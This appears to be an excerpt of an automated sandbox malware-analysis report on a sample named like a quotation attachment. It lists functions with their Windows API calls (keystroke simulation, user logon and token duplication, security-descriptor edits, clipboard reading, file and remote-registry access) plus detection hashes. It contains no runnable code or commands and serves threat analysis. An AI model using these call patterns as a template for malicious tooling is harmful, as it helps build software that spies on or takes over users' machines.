                                                                                      • SetCapture.USER32(?), ref: 0015994A
                                                                                      • ClientToScreen.USER32(?,?), ref: 001599AF
                                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 001599BC
                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001599D6
                                                                                      • ReleaseCapture.USER32 ref: 001599E1
                                                                                      • GetCursorPos.USER32(?), ref: 00159A19
                                                                                      • ScreenToClient.USER32(?,?), ref: 00159A26
                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00159A80
                                                                                      • SendMessageW.USER32 ref: 00159AAE
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00159AEB
                                                                                      • SendMessageW.USER32 ref: 00159B1A
                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00159B3B
                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00159B4A
                                                                                      • GetCursorPos.USER32(?), ref: 00159B68
                                                                                      • ScreenToClient.USER32(?,?), ref: 00159B75
                                                                                      • GetParent.USER32(?), ref: 00159B93
                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00159BFA
                                                                                      • SendMessageW.USER32 ref: 00159C2B
                                                                                      • ClientToScreen.USER32(?,?), ref: 00159C84
                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00159CB4
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00159CDE
                                                                                      • SendMessageW.USER32 ref: 00159D01
                                                                                      • ClientToScreen.USER32(?,?), ref: 00159D4E
                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00159D82
                                                                                        • Part of subcall function 000D9944: GetWindowLongW.USER32(?,000000EB), ref: 000D9952
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00159E05
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                      • String ID: @GUI_DRAGID$F
                                                                                      • API String ID: 3429851547-4164748364
                                                                                      • Opcode ID: 070ad3fa64374542d34f7c9df8966734506f17b141a29ea78ac9a90b8da5c5f0
                                                                                      • Instruction ID: 5d1c605c6e40d2b424feef0e14b729146206454f46baa6e0fa3d669961f9f85b
                                                                                      • Opcode Fuzzy Hash: 070ad3fa64374542d34f7c9df8966734506f17b141a29ea78ac9a90b8da5c5f0
                                                                                      • Instruction Fuzzy Hash: 8A429C74204301EFDB25CF24CD44AAABBE5FF48315F10061EF9698B6A1D731A998DF92
                                                                                      Function 00154873 Relevance: 56.6, APIs: 31, Strings: 1, Instructions: 566windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 001548F3
                                                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00154908
                                                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00154927
                                                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0015494B
                                                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0015495C
                                                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0015497B
                                                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 001549AE
                                                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 001549D4
                                                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00154A0F
                                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00154A56
                                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00154A7E
                                                                                      • IsMenu.USER32(?), ref: 00154A97
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00154AF2
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00154B20
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00154B94
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00154BE3
                                                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00154C82
                                                                                      • wsprintfW.USER32 ref: 00154CAE
                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00154CC9
                                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00154CF1
                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00154D13
                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00154D33
                                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00154D5A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                      • String ID: %d/%02d/%02d
                                                                                      • API String ID: 4054740463-328681919
                                                                                      • Opcode ID: 636be646defbff44c1c79631e461c173ee8a5bbabe3e59087b1b065c876b8f25
                                                                                      • Instruction ID: f6dbd103fef0e1047808425eb319563f75f11c78759474e50ea748510d39a147
                                                                                      • Opcode Fuzzy Hash: 636be646defbff44c1c79631e461c173ee8a5bbabe3e59087b1b065c876b8f25
                                                                                      • Instruction Fuzzy Hash: F712CF71600314EFEB258F68CC49FEE7BB8EB45719F10411AF926DE2A1DB749A84CB50
                                                                                      Function 000DF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 000DF998
                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0011F474
                                                                                      • IsIconic.USER32(00000000), ref: 0011F47D
                                                                                      • ShowWindow.USER32(00000000,00000009), ref: 0011F48A
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0011F494
                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0011F4AA
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0011F4B1
                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0011F4BD
                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0011F4CE
                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0011F4D6
                                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0011F4DE
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0011F4E1
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0011F4F6
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0011F501
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0011F50B
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0011F510
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0011F519
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0011F51E
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0011F528
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0011F52D
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0011F530
                                                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0011F557
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                      • String ID: Shell_TrayWnd
                                                                                      • API String ID: 4125248594-2988720461
                                                                                      • Opcode ID: fa67de7864ebb8172223bfe342b5ca3bb656711e73e407d3f3b4fb43e5ade5c5
                                                                                      • Instruction ID: b6074ddf2ee5d394851224cb2c93f1173152f61514ba9bf3f6673b8149705daf
                                                                                      • Opcode Fuzzy Hash: fa67de7864ebb8172223bfe342b5ca3bb656711e73e407d3f3b4fb43e5ade5c5
                                                                                      • Instruction Fuzzy Hash: 6D318D71B40318BEEB246FB55C4AFBF7E6DEB44B51F100069FA00EA1D1D7B05981AAA0
                                                                                      Function 00121201 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 241COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 001216C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0012170D
                                                                                        • Part of subcall function 001216C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0012173A
                                                                                        • Part of subcall function 001216C3: GetLastError.KERNEL32 ref: 0012174A
                                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00121286
                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 001212A8
                                                                                      • CloseHandle.KERNEL32(?), ref: 001212B9
                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001212D1
                                                                                      • GetProcessWindowStation.USER32 ref: 001212EA
                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 001212F4
                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00121310
                                                                                        • Part of subcall function 001210BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001211FC), ref: 001210D4
                                                                                        • Part of subcall function 001210BF: CloseHandle.KERNEL32(?,?,001211FC), ref: 001210E9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                      • String ID: $default$winsta0
                                                                                      • API String ID: 22674027-1027155976
                                                                                      • Opcode ID: 7eb02f70587009be54e78db93a37dbc9e113e1af1abd0cebdd20193963f02956
                                                                                      • Instruction ID: a5ec81c4a355613b55f8165e9c946ab9614473473f32ef94565e00f48ed500f4
                                                                                      • Opcode Fuzzy Hash: 7eb02f70587009be54e78db93a37dbc9e113e1af1abd0cebdd20193963f02956
                                                                                      • Instruction Fuzzy Hash: C481AD71900359BFDF20EFA4EC49BEE7BB9EF14700F144129F915A62A0D7708AA4CB60
                                                                                      Function 00120B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 001210F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00121114
                                                                                        • Part of subcall function 001210F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00120B9B,?,?,?), ref: 00121120
                                                                                        • Part of subcall function 001210F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00120B9B,?,?,?), ref: 0012112F
                                                                                        • Part of subcall function 001210F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00120B9B,?,?,?), ref: 00121136
                                                                                        • Part of subcall function 001210F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0012114D
                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00120BCC
                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00120C00
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00120C17
                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00120C51
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00120C6D
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00120C84
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00120C8C
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00120C93
                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00120CB4
                                                                                      • CopySid.ADVAPI32(00000000), ref: 00120CBB
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00120CEA
                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00120D0C
                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00120D1E
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00120D45
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00120D4C
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00120D55
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00120D5C
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00120D65
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00120D6C
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00120D78
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00120D7F
                                                                                        • Part of subcall function 00121193: GetProcessHeap.KERNEL32(00000008,00120BB1,?,00000000,?,00120BB1,?), ref: 001211A1
                                                                                        • Part of subcall function 00121193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00120BB1,?), ref: 001211A8
                                                                                        • Part of subcall function 00121193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00120BB1,?), ref: 001211B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                      • String ID:
                                                                                      • API String ID: 4175595110-0
                                                                                      • Opcode ID: e32eff31de3325c9b337da8195d85bfafbac9e399e12f8f8e9c326a62cce97ee
                                                                                      • Instruction ID: 4c170a9acf8b738c55cc20a3bd803a9d51d08bcdd59c538f5d8ee7bb87b00b32
                                                                                      • Opcode Fuzzy Hash: e32eff31de3325c9b337da8195d85bfafbac9e399e12f8f8e9c326a62cce97ee
                                                                                      • Instruction Fuzzy Hash: ED716A7590131AEFDF11DFE4EC44BAEBBB8EF08311F044215F914AA292D771AA55CBA0
                                                                                      Function 0013EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • OpenClipboard.USER32(0015CC08), ref: 0013EB29
                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0013EB37
                                                                                      • GetClipboardData.USER32(0000000D), ref: 0013EB43
                                                                                      • CloseClipboard.USER32 ref: 0013EB4F
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0013EB87
                                                                                      • CloseClipboard.USER32 ref: 0013EB91
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0013EBBC
                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0013EBC9
                                                                                      • GetClipboardData.USER32(00000001), ref: 0013EBD1
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0013EBE2
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0013EC22
                                                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 0013EC38
                                                                                      • GetClipboardData.USER32(0000000F), ref: 0013EC44
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0013EC55
                                                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0013EC77
                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0013EC94
                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0013ECD2
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0013ECF3
                                                                                      • CountClipboardFormats.USER32 ref: 0013ED14
                                                                                      • CloseClipboard.USER32 ref: 0013ED59
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                      • String ID:
                                                                                      • API String ID: 420908878-0
                                                                                      • Opcode ID: 20b53fc997128f997d98f04248fc179e4e04ddee1395c0a7ee1dac4b2776ecd8
                                                                                      • Instruction ID: 64c18a18df515a6f6d969ca9bba311ca4801362ac9f3bb187aacb7dff6a02174
                                                                                      • Opcode Fuzzy Hash: 20b53fc997128f997d98f04248fc179e4e04ddee1395c0a7ee1dac4b2776ecd8
                                                                                      • Instruction Fuzzy Hash: EB61AB34204301AFD310EF64D899F6AB7E4EF84714F14455DF4569B2E2CB71EA85CBA2
                                                                                      Function 0013698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 001369BE
                                                                                      • FindClose.KERNEL32(00000000), ref: 00136A12
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00136A4E
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00136A75
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00136AB2
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00136ADF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                      • API String ID: 3232708057-3289030164
                                                                                      • Opcode ID: 61f4dde533c6329b2f8cf03d7b5a7faaa2705fe5aac4350190f344e0bb9cad0c
                                                                                      • Instruction ID: ae95291748b613a023416962041e84ca580752b6d6bfca8e34f67b561b9f8e14
                                                                                      • Opcode Fuzzy Hash: 61f4dde533c6329b2f8cf03d7b5a7faaa2705fe5aac4350190f344e0bb9cad0c
                                                                                      • Instruction Fuzzy Hash: 43D14171508340AFC714EBA4C886EAFB7ECAF88704F44491DF589D7192EB74DA49CB62
                                                                                      Function 00139642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?,77098FB0,?,00000000), ref: 00139663
                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 001396A1
                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 001396BB
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 001396D3
                                                                                      • FindClose.KERNEL32(00000000), ref: 001396DE
                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 001396FA
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0013974A
                                                                                      • SetCurrentDirectoryW.KERNEL32(00186B7C), ref: 00139768
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00139772
                                                                                      • FindClose.KERNEL32(00000000), ref: 0013977F
                                                                                      • FindClose.KERNEL32(00000000), ref: 0013978F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1409584000-438819550
                                                                                      • Opcode ID: 22cac37931d8a3bd398360795bb55ed5066e73643b7fbc3c96c03bd8f0185c52
                                                                                      • Instruction ID: ca328e2ce59952a3fe0ba1af424e2579a1362189401a65fd945e64ebeb9ef132
                                                                                      • Opcode Fuzzy Hash: 22cac37931d8a3bd398360795bb55ed5066e73643b7fbc3c96c03bd8f0185c52
                                                                                      • Instruction Fuzzy Hash: 1631F13264131AAFDF14AFB4DC49ADE77ACAF09322F144055F915E60E0EBB4DE848E90
                                                                                      Function 0013979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?,77098FB0,?,00000000), ref: 001397BE
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00139819
                                                                                      • FindClose.KERNEL32(00000000), ref: 00139824
                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00139840
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00139890
                                                                                      • SetCurrentDirectoryW.KERNEL32(00186B7C), ref: 001398AE
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 001398B8
                                                                                      • FindClose.KERNEL32(00000000), ref: 001398C5
                                                                                      • FindClose.KERNEL32(00000000), ref: 001398D5
                                                                                        • Part of subcall function 0012DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0012DB00
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                      • String ID: *.*
                                                                                      • API String ID: 2640511053-438819550
                                                                                      • Opcode ID: 5eb7a3c5a5a6d2922a9190e7b573a9ce56da2599c7278b2dcfbfce378315a26a
                                                                                      • Instruction ID: c4c14ed6f4700d1a6af0bbb87d468a715dab0e2e164c30e89f66f9bf9a11c78f
                                                                                      • Opcode Fuzzy Hash: 5eb7a3c5a5a6d2922a9190e7b573a9ce56da2599c7278b2dcfbfce378315a26a
                                                                                      • Instruction Fuzzy Hash: 2D31D23250035EAEDF10EFB4EC48ADE77ACAF46325F1441A5E950A60A1DBB4DE84CF60
                                                                                      Function 0014BE44 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0014C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0014B6AE,?,?), ref: 0014C9B5
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0014BF3E
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0014BFA9
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0014BFCD
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0014C02C
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0014C0E7
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0014C154
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0014C1E9
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0014C23A
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0014C2E3
                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0014C382
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0014C38F
